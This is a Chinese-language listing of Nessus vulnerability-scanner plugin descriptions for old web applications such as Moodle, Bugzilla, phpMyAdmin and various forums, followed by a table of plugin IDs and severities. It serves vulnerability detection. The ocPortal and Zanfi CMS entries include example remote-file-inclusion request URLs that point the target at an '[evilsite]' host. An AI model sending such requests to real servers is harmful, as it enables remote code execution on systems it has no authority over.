远程主机正在运行 PHP/FI。

此软件的远程版本的文件 mylog.html/mlog.html 中包含一个缺陷，该缺陷允许远程攻击者查看远程主机上的任意文件。

根据其标题，远程版本的 Mantis 受到多个信息泄露漏洞的影响，这些漏洞允许攻击者查看所有项目的统计数据，或在从中删除恶意用户后收到该项目的信息。

远程主机正在运行 IceWarp Web Mail，这是一个适用于 Microsoft Windows 平台的网络邮件解决方案。

此软件的远程版本容易受到多个输入验证问题的影响，这些问题可能允许攻击者破坏远程主机的完整性。

远程主机上运行的 Moodle 套件版本低于 1.4.3。因此，该套件受到“glossary”模块中的 SQL 注入漏洞的影响，这是缺少用户输入审查所致。

此外，据报告，Moodle 还受到目录遍历和跨站脚本缺陷的影响。不过，Nessus 尚未针对这些问题进行明确测试。

远程 Web 服务器包含的 Gallery 版本允许攻击者通过不明矢量注入任意 HTML 标记。

远程主机正在运行 Horde，这是一款来自 The Horde Project 的基于 PHP 的应用程序框架。

根据其版本号，远程 Bugzilla 错误跟踪系统容易受到任意命令执行缺陷的影响，这是对 process_bug.cgi 中用户提供的数据缺少审查所致。

远程 Web 服务器上安装了“_maincfgret”CGI。某些版本容易受到缓冲区溢出的影响。请注意，Nessus 仅检测是否存在此 CGI，而且未尝试确定其是否存在漏洞。

根据其版本号，远程 Bugzilla 错误跟踪系统容易受到多个缺陷的影响，这些缺陷可能让攻击者绕过身份验证或获得私人缺陷报告的访问权限。

UBB.threads 的远程版本存在一个 SQL 注入问题，该问题可能允许攻击者通过向“dosearch.php”文件的“Name”参数发送畸形值，在远程主机上执行任意 SQL 语句并可能覆盖远程系统上的任意文件。

远程主机正在运行 WowBB，这是一个以 PHP 编写的网上论坛。 

根据其版本，远程安装的 WowBB 版本 1.61 或更低版本。此类版本容易遭受跨站脚本攻击和 SQL 注入攻击。恶意用户可以窃取用户的 Cookie（包括身份验证 Cookie）并操纵 SQL 查询。

远程主机正在运行 DevoyBB，这是一个以 PHP 编写的网上论坛。 

安装的版本容易遭受 XSS 和 SQL 注入攻击。恶意用户可访问用户的 Cookie，包括身份验证 Cookie，并注入要在底层数据库上执行的 SQL 命令。

Serendipity 的远程版本受到一个 HTTP 响应拆分漏洞的影响，该漏洞可能允许攻击者对远程主机执行跨站脚本攻击。

远程主机上安装了 nbmember.cgi。

此软件的远程版本容易受到一个信息泄露缺陷的影响，该缺陷可能允许攻击者访问敏感系统信息，从而导致机密性丢失。

远程主机正在运行 IdealBB，这是一款以 ASP 编写的基于 Web 的公告板。

此软件的远程版本存在多个缺陷：SQL 注入、跨站脚本和 HTTP 响应拆分漏洞。

远程主机正在运行 Coppermine Gallery，这是一组用于处理图片库的 PHP 脚本。

此产品存在一个漏洞，该漏洞允许禁用 Cookie 的远程攻击者为一张图片投多票。

此插件确定远程 Web 服务器上是否安装了 Coppermine Photo Gallery，并提取找到的任何实例的版本号和位置。

Coppermine 是一个以 PHP 编写的基于 Web 的开源图片库应用程序。

目标正在运行至少一个 Open WebMail 实例，其中 userstat.pl 组件未能充分验证用户输入。此问题使远程攻击者能够使用运行 Web 服务器的特权在目标上执行任意程序。有关更多信息，请参阅：

  http://www.openwebmail.org/openwebmail/download/cert/advisories/SA-04:01.txt

远程主机正在运行 CoolPHP 内容管理系统。

此软件的远程版本中存在多个缺陷，这些缺陷可能允许攻击者读取远程主机上的任意文件或发起跨站脚本攻击。

根据其标题，phpMyAdmin 的远程版本介于 2.5.0 到 2.6.0-pl1 之间。此类版本可能允许经过身份验证的远程攻击者以 Web 服务器的特权运行任意命令，这是处理基于外部 MIME 的转换方式所致。 

请注意，成功利用需要禁用 PHP 的“safe_mode”，并且管理员不仅要准备用于保留某些信息的特殊表格，还要在配置中对其进行指定。

远程主机似乎正在运行 BugPort，这是一个基于 Web 的开源系统，用于管理整个软件开发过程中的任务和缺陷。

此版本的 BugPort 包含一个不明附件处理缺陷。

远程主机正在运行 ocPortal，这是一个以 PHP 编写的内容管理系统。

此软件的远程版本中存在一个错误，该错误可能允许攻击者通过使用文件“index.php”中的文件包含错误，在远程主机上执行任意命令。

攻击者可以通过以下请求执行任意命令：

  http://www.example.com/index.php?req_path=http://[evilsite]/

将使远程脚本包含远程站点上的文件“funcs.php”并执行该文件。

远程服务器运行的 bBlog 版本是以 PHP 编写并在 GPL 下发布的博客系统，其版本与版本 0.7.4 相同或更低。 

此软件的远程版本受到脚本“rss.php”中的 SQL 注入攻击的影响。此问题是应用程序未能正确审查用户提供的输入所致。 

攻击者可能会利用此缺陷在此主机上执行任意 PHP 代码或控制远程数据库。

远程主机运行 CactuShop，这是一个以 ASP 编写的 Web 应用程序。

此软件的远程版本容易遭受跨站脚本攻击，这是对用户在“popuplargeimage.asp”脚本中提供的数据缺少审查所致。

若成功利用此问题，攻击者便可在易受影响的服务器上执行恶意脚本代码。 

此版本也可能容易受到脚本“mailorder.asp”和“payonline.asp”中的 SQL 注入攻击。未过滤用户在“strItems”参数中提供的输入，便将其用于 SQL 查询。因此，可以通过畸形输入进行查询修改。

若成功利用此漏洞，攻击者便可在系统中执行命令（通过 MS SQL 函数 xp_cmdshell）。

远程主机正在运行 DUware 发布的一款产品，即 DUclassmate、DUclassified 或 DUforum。

此软件的远程版本中存在一个缺陷，该确诊允许攻击者通过向 /admin/、messages.asp 或 messagesDetails.asp 的参数提供畸形值在远程主机上执行任意 SQL 语句。

此外，DUclassified 在消息文本处理中包含一个跨站脚本漏洞。DUclassmate 的 account.asp 中包含一个未经授权的密码操纵问题。

远程主机正在运行 Zanfi CMS Lite，这是一个以 PHP 编写的内容管理系统。 

此软件的远程版本中存在一个错误，该错误可能允许攻击者通过使用文件“index.php”中的文件包含错误，在远程主机上执行任意命令。 

攻击者可以通过以下请求执行任意命令：

  http://www.example.com/index.php?inc=http://[evilsite]/commands

这将使远程脚本包含文件“commands.php”并执行改文件。

远程主机正在运行 GoSmart 消息板，这是一个以 ASP 编写的公告板管理器。

此软件的远程版本包含多个缺陷，这是应用程序未能正确审查用户提供的输入所致。

它还受到一个跨站脚本漏洞的影响。远程攻击者可利用此漏洞创建恶意链接，一旦不知情的用户访问该链接，便会在其浏览器中执行链接所包含的脚本代码。

此外，此版本容易受到 SQL 注入缺陷的影响，这些缺陷使攻击者可以注入任意 SQL 命令。

远程主机正在运行 BlackBoard Internet Newsboard System，这是一个基于 PHP 的开源 Internet 公告板软件应用程序。

此软件的远程版本容易受到 checkdb.inc.php 中一个远程文件包含缺陷的影响，这是对用户对“liapath”参数提供的数据缺少审查所致。

若成功利用此问题，攻击者便可在易受影响的服务器上执行恶意脚本代码。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。因此，
*** 这可能是一则误报。

根据其标题，远程版本的 WordPress 容易遭受 HTTP 拆分攻击，其中攻击者可插入 CR LF 字符，然后引诱没有防备的用户访问 URL。客户端将解析攻击者提供的辅助标头并可能对其进行操作。

CubeCart 的远程版本存在一个 SQL 注入问题，该问题允许攻击者通过向远程主机上的多个文件发送格式错误的值，在远程主机上执行任意 SQL 语句并可能覆盖远程系统上的任意文件。

远程主机正在运行 w-agora，这是一个以 PHP 编写的网上论坛应用程序。

此软件的远程版本容易遭受目录遍历攻击。远程攻击者可发送特别构建的 URL，使用 Web 服务器进程的特权读取远程系统上的任意文件。

远程服务器正在运行的 PHP 版本低于 5.0.2 或 4.39。

此软件的远程版本受到 PHP_Variables 中内存泄露漏洞的影响。攻击者可能会利用此缺陷远程读取远程主机上 httpd 进程的内存部分。

远程主机上安装的 PHP-Fusion 版本存在一个漏洞，该漏洞可能允许经过身份验证的攻击者注入任意 SQL 代码，这是未正确验证用户针对脚本“members.php”的“rowstart”参数和 “comments.php”脚本的“comment_id”参数提供的输入所致。

此外，该软件版本还包含多个跨站脚本问题，以及一个信息泄露漏洞；但是，Nessus 尚未针对这些问题进行测试。

远程主机正在运行 Silent-Storm，这是一款以 PHP 编写的基于 Web 的论坛管理软件。

此软件的远程版本中存在多个输入验证缺陷：

  - 存在一个与“index.php”脚本的“module”参数有关的跨站脚本漏洞。

  - 该应用程序未能审查“profile.php”脚本的“mail”参数，该参数可被滥用以将任意数据注入“users.dat”数据库文件，例如，获取应用程序的管理访问权限。

远程主机正在运行 w-agora，这是一个以 PHP 编写的基于 Web 的论坛管理软件。

此软件的远程版本中存在多个输入验证缺陷：

  - “redir_url.php”文件中存在一个 SQL 注入漏洞，该漏洞允许攻击者在远程数据库中执行任意 SQL 语句；

  - 存在一个跨站脚本问题，该问题允许攻击者通过向远程站点的合法用户发送畸形链接来窃取其 Cookie；

  - 存在一个 HTTP 响应拆分漏洞，该漏洞允许攻击者对远程主机执行跨站脚本攻击。

远程服务器运行某个版本的 Icecast，这是一款开源流音频服务器，其版本低于 1.3.12。

此版本受到一个远程缓冲区溢出漏洞的影响，这是因为它未正确检查客户端发送的数据边界。 

由于此漏洞，远程攻击者可以导致堆栈溢出，然后以服务器的特权执行任意代码。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。

远程服务器运行版本 1.3.10 或更低版本的 Icecast，这是一款开源流媒体音频服务器。

这些版本受到目录遍历缺陷的影响，这是因为应用程序未能正确审查用户提供的输入。

攻击者可以发送特别构建的 URL，以查看系统上的任意文件。

*** Nessus 仅使用收集到的信息
*** 报告此漏洞。

远程主机正在运行 Vignette Application Portal，这是一个商用门户套件。

此软件的远程版本中存在一个信息泄露漏洞。攻击者可请求诊断实用工具，这样可以通过请求 /portal/diag/ 泄露有关远程站点的信息。

远程版本的 Serendipity 容易受到 SQL 注入问题的影响，这是应用程序未能正确审查用户提供的输入所致。

攻击者可能会利用此缺陷在远程数据库中发出任意语句，从而绕过授权，甚至覆盖远程系统上的任意文件

此外，此 comment.php 脚本容易遭受跨站脚本攻击。

远程主机正在运行 MegaBBS，这是一款以 ASP 编写的基于 Web 的公告板系统。

此软件的远程版本容易遭受 SQL 注入攻击，这是对用户提供的输入缺少审查所致。攻击者可能会利用此缺陷在远程数据库中发出任意语句，从而绕过授权，甚至覆盖远程系统上的任意文件。

远程主机似乎正在运行 @lex guestbook，这是一款以 PHP 编写的留言簿 Web 应用程序。 

报告的版本可能允许远程攻击者在未经事先身份验证的情况下包含并执行恶意 PHP 脚本。通过修改“livre_include.php”脚本的“chem_absolu”参数，可在远程系统上执行任意 PHP 代码。

远程主机似乎正在运行 BroadBoard，这是一种用于管理基于 Web 的公告板系统的 ASP 脚本。

远程软件中存在一个缺陷，该缺陷允许远程攻击者注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机运行 Pinnacle ShowCenter 基于 Web 的界面。

此软件的远程版本容易遭受远程拒绝服务攻击，这是缺少皮肤参数健全性检查所致。

攻击者可利用特别构建的 URL 拒绝 ShowCenter 基于 Web 的界面的服务。

远程主机似乎正在运行 aspWebAlbum，这是一款 ASP 脚本，旨在附近在基于 Web 的应用程序中集成多个相册。

远程软件中存在一个缺陷，该缺陷允许任何人注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机似乎正在运行 aspWebCalendar，这是一款 ASP 脚本，旨在促进在基于 Web 的应用程序中集成多种日历。

远程软件中存在一个缺陷，该缺陷允许任何人注入任意 SQL 命令，从而可用于获取对远程主机的管理访问权限。

远程主机正在使用 YaBB 1 Gold Web 论坛软件。 

根据其版本号，此软件的远程版本容易受到多个输入验证问题的影响，这些问题可能允许攻击者对远程主机执行跨站脚本或 HTTP 拆分攻击。

远程主机正在运行 EmuLive Server4，这是一款 Web 和媒体流服务器。

管理界面中存在一个缺陷，该缺陷允许远程攻击者通过直接请求页面“/public/admin/index.htm”绕过身份验证程序。

攻击者可能会利用此缺陷获取远程服务的管理访问权限。

据报告，Emulive 在处理回车符时也存在拒绝服务情况，但 Nessus 尚未检查此问题。

远程主机正在运行 Tutos，这是一个以 PHP 编写的开源团队组织软件程序包。

根据其标题，此软件的远程版本容易受到多个输入验证缺陷的影响，这些缺陷允许经身份验证的用户对远程服务执行跨站脚本攻击、路径泄露攻击或 SQL 注入。

远程主机似乎正在使用 phpMyBackupPro。 

据报告，此软件的远程版本容易受到与用户输入验证有关的多个安全漏洞的影响。 

攻击者可能会利用这些问题获得应用程序的访问权限或访问底层数据库。

ID	名称	严重性
15708	PHP < 3.0 mylog.html/mlog.html 任意文件访问	medium
15651	Mantis < 0.19.1 多个漏洞	medium
15643	IceWarp Web Mail 多个缺陷 (2)	medium
15639	Moodle < 1.4.3 多个漏洞	high
15624	Gallery 不明 HTML 注入	medium
15604	Horde 软件检测	info
15565	Bugzilla 多个远程命令执行	high
15564	Ipswitch WhatsUp Gold _maincfgret.cgi 远程溢出	high
15562	Bugzilla < 2.16.7 / 2.18.0rc3 多个信息泄露	medium
15561	UBB.threads dosearch.php SQL 注入	high
15557	WowBB <= 1.61 多个漏洞	high
15556	DevoyBB 多个远程漏洞（SQLi、XSS）	high
15543	Serendipity 多个脚本 HTTP 响应拆分	medium
15542	Netbilling nbmember.cgi cmd 参数信息泄露	medium
15541	IdealBB 多个漏洞（XSS、SQLi 等）	medium
15531	Coppermine Photo Gallery 投票限制绕过	medium
15530	Coppermine Photo Gallery 检测	info
15529	Open WebMail userstat.pl 任意命令执行	high
15506	CoolPHP 1.0 多个漏洞	medium
15478	phpMyAdmin < 2.6.0-pl2 不明任意命令执行	medium
15470	BugPort 附加文件处理不明问题	high
15469	IceWarp Web Mail 多个缺陷 (1)	high
15468	ocPortal index.php req_path 参数远程文件包含	high
15466	bBlog rss.php p 参数 SQL 注入	high
15461	CactuShop 5.x 多个远程漏洞（XSS、SQLi）	high
15453	DUware 产品多个远程漏洞（SQLi、XSS）	high
15452	Zanfi CMS Lite index.php inc 参数远程文件包含	high
15451	GoSmart Message Board 多个漏洞（SQLi、XSS）	high
15450	BlackBoard Internet Newsboard System checkdb.inc.php libpath 参数远程文件包含	high
15443	WordPress“wp-login.php”HTTP 响应拆分	medium
15442	CubeCart index.php cat_id 参数 SQL 注入	high
15437	w-Agora 多个脚本遍历任意文件访问	medium
15436	PHP php_variables.c 多种变量左方括号内存泄露	medium
15433	PHP-Fusion 4.01 多个漏洞	medium
15403	Silent-Storm Portal 多个输入验证漏洞	high
15402	w-Agora 4.1.6a 多个输入验证漏洞	high
15401	Icecast MP3 Client HTTP GET 请求远程溢出	high
15396	Icecast 编码遍历任意文件访问	medium
14847	Vignette 应用程序门户诊断实用工具信息泄露	medium
14842	Serendipity < 0.7.0beta3 多个漏洞	high
14837	PD9 MegaBBS 多个漏洞	high
14830	@lex Guestbook livre_include.php chem_absolu 参数远程文件包含	high
14828	BroadBoard 多个脚本 SQL 注入	high
14824	Pinnacle ShowCenter Skin DoS	medium
14817	aspWebAlbum Album.asp SQL 注入	medium
14816	aspWebCalendar calendar.asp SQL 注入	medium
14806	YaBB 1 Gold < 1.3.2 多个输入验证漏洞	medium
14805	Emulive Server4 身份验证绕过	high
14793	TUTOS < 1.1.20040412 多个输入验证问题	high
14787	phpMyBackupPro < 1.0.0 不明输入验证问题	high

检测

Nessus 的 CGI abuses 系列

medium

medium

medium

high

medium

info

high

high

medium

high

high

high

medium

medium

medium

medium

info

high

medium

medium

high

high

high

high

high

high

high

high

high

medium

high

medium

medium

medium

high

high

high

medium

medium

high

high

high

high

medium

medium

medium

medium

high

high

high